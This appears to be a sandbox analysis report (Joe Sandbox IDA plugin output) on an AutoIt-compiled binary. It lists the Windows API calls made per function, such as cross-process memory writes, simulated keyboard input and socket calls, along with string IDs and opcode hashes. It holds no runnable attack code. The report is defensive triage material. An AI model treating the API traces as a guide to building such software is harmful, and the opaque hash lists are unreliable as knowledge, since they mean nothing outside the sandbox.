                                                                                        • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                                                                                        APIs
                                                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                                                                                        • __swprintf.LIBCMT ref: 00412ECD
                                                                                        Strings
                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                                                                                        Similarity
                                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                        • API String ID: 1943609520-557222456
                                                                                        • Opcode ID: f2537484895ed5ec52989982d5153f2265213e107307e8104f4bcaf0829080bd
                                                                                        • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                                                                                        • Opcode Fuzzy Hash: f2537484895ed5ec52989982d5153f2265213e107307e8104f4bcaf0829080bd
                                                                                        • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                                                                                        APIs
                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ContainedObject
                                                                                        • String ID: AutoIt3GUI$Container$%I
                                                                                        • API String ID: 3565006973-4251005282
                                                                                        • Opcode ID: b0ef9ef2592e363b8beabdfb88cbb6824cc0f8258bc98d745d804ae61dd96c16
                                                                                        • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                                                                                        • Opcode Fuzzy Hash: b0ef9ef2592e363b8beabdfb88cbb6824cc0f8258bc98d745d804ae61dd96c16
                                                                                        • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                                                                                        APIs
                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                                                                                          • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ErrorHandling__87except__start
                                                                                        • String ID: pow
                                                                                        • API String ID: 2905807303-2276729525
                                                                                        • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                                                        • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                                                                                        • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                                                        • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: 3cA$_A
                                                                                        • API String ID: 4104443479-3480954128
                                                                                        • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                                        • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                                                                                        • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                                        • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                                                                                        APIs
                                                                                          • Part of subcall function 004614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00459296,?,?,00000034,00000800,?,00000034), ref: 004614E6
                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0045983F
                                                                                          • Part of subcall function 00461487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 004614B1
                                                                                          • Part of subcall function 004613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00461409
                                                                                          • Part of subcall function 004613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 00461419
                                                                                          • Part of subcall function 004613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 0046142F
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598AC
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598F9
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                        • String ID: @
                                                                                        • API String ID: 4150878124-2766056989
                                                                                        • Opcode ID: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
                                                                                        • Instruction ID: 83720f96416bb9890d74edf788c2ecf3a7fc11859df44560b8e2e1ee8df86db8
                                                                                        • Opcode Fuzzy Hash: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
                                                                                        • Instruction Fuzzy Hash: 8E41627690021CBFDB10DFA5CC41EDEBBB8EB05300F14415AF945B7251DA746E89CBA5
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: SysMonthCal32
                                                                                        • API String ID: 2326795674-1439706946
                                                                                        • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                                        • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                                                                                        • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                                        • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend$MoveWindow
                                                                                        • String ID: Listbox
                                                                                        • API String ID: 3315199576-2633736733
                                                                                        • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                                        • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                                                                                        • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                                        • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00487772
                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00487787
                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00487794
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: msctls_trackbar32
                                                                                        • API String ID: 3850602802-1010561917
                                                                                        • Opcode ID: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
                                                                                        • Instruction ID: f92afa797eeb34fec66cc861e9e49cfc52a42a3b8dc3c72e421b2ad803853977
                                                                                        • Opcode Fuzzy Hash: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
                                                                                        • Instruction Fuzzy Hash: 78112732204208BEEF106F61CC01FDF7768EF88B54F21052EFA41A21A0C275F851CB24
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: __calloc_crt
                                                                                        • String ID: K$@BL
                                                                                        • API String ID: 3494438863-2209178351
                                                                                        • Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                                        • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                                                                                        • Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                                        • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-3689287502
                                                                                        • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                                        • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                                                                                        • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                                        • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-1355242751
                                                                                        • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                                        • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                                                                                        • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                                        • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                        • API String ID: 2574300362-4033151799
                                                                                        • Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                                                        • Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
                                                                                        • Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                                                        • Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                        • API String ID: 2574300362-199464113
                                                                                        • Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                                                        • Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
                                                                                        • Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                                                        • Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: LocalTime__swprintf
                                                                                        • String ID: %.3d$WIN_XPe
                                                                                        • API String ID: 2070861257-2409531811
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0047E101
                                                                                          • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                                                                                        • _memmove.LIBCMT ref: 0047E314
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 3659485706-0
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 004780C3
                                                                                        • CoUninitialize.OLE32 ref: 004780CE
                                                                                          • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                                                        • VariantInit.OLEAUT32(?), ref: 004780D9
                                                                                        • VariantClear.OLEAUT32(?), ref: 004783AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 780911581-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                        • String ID:
                                                                                        • API String ID: 2808897238-0
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(00CD3970,?), ref: 00489863
                                                                                        • ScreenToClient.USER32(00000002,00000002), ref: 00489896
                                                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00489903
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                        • String ID:
                                                                                        • API String ID: 3880355969-0
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                                                        • String ID:
                                                                                        • API String ID: 2214342067-0
                                                                                        APIs
                                                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                                                                                        • _strlen.LIBCMT ref: 004764D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _strlen
                                                                                        • String ID:
                                                                                        • API String ID: 4218353326-0
                                                                                        APIs
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0046B89E
                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0046B8C4
                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0046B8E9
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0046B915
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 3321077145-0
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                                        • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                                                                                        • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                                        • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                                                                                        APIs
                                                                                        • ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                                        • GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                                        • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                                        • MessageBeep.USER32(00000000), ref: 0048AC57
                                                                                        Similarity
                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1352109105-0
                                                                                        • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                                        • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                                                                                        • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                                        • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                                                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                                                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                                        • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                                                                                        • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                                        • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00460C66
                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                                                                                        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00460D33
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                                        • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                                                                                        • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                                        • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                                                                                        APIs
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                                                                                        • __isleadbyte_l.LIBCMT ref: 00436229
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 3058430110-0
                                                                                        • Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                                                        • Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
                                                                                        • Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                                                        • Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 00484F02
                                                                                          • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                                                                                          • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                                                                                          • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                                                                                        • GetCaretPos.USER32(?), ref: 00484F13
                                                                                        • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                                                                                        • GetForegroundWindow.USER32 ref: 00484F54
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                        • String ID:
                                                                                        • API String ID: 2759813231-0
                                                                                        • Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                                                        • Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
                                                                                        • Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                                                        • Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • GetCursorPos.USER32(?), ref: 0048C4D2
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                                                                                        • GetCursorPos.USER32(?), ref: 0048C534
                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                                                                                        Similarity
                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2864067406-0
                                                                                        • Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                                                        • Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
                                                                                        • Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                                                        • Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
                                                                                        APIs
                                                                                          • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                                                          • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                                                          • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                                                          • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                                                          • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                                                                                        • _memcmp.LIBCMT ref: 004586C6
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00458703
                                                                                        Similarity
                                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 1592001646-0
                                                                                        • Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                                                        • Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
                                                                                        • Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                                                        • Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
                                                                                        APIs
                                                                                        • __setmode.LIBCMT ref: 004209AE
                                                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                                        • _fprintf.LIBCMT ref: 004209E5
                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                                                                                          • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                                                                                        • __setmode.LIBCMT ref: 00420A1A
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                        • String ID:
                                                                                        • API String ID: 521402451-0
                                                                                        • Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                                                        • Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
                                                                                        • Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                                                        • Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
                                                                                        APIs
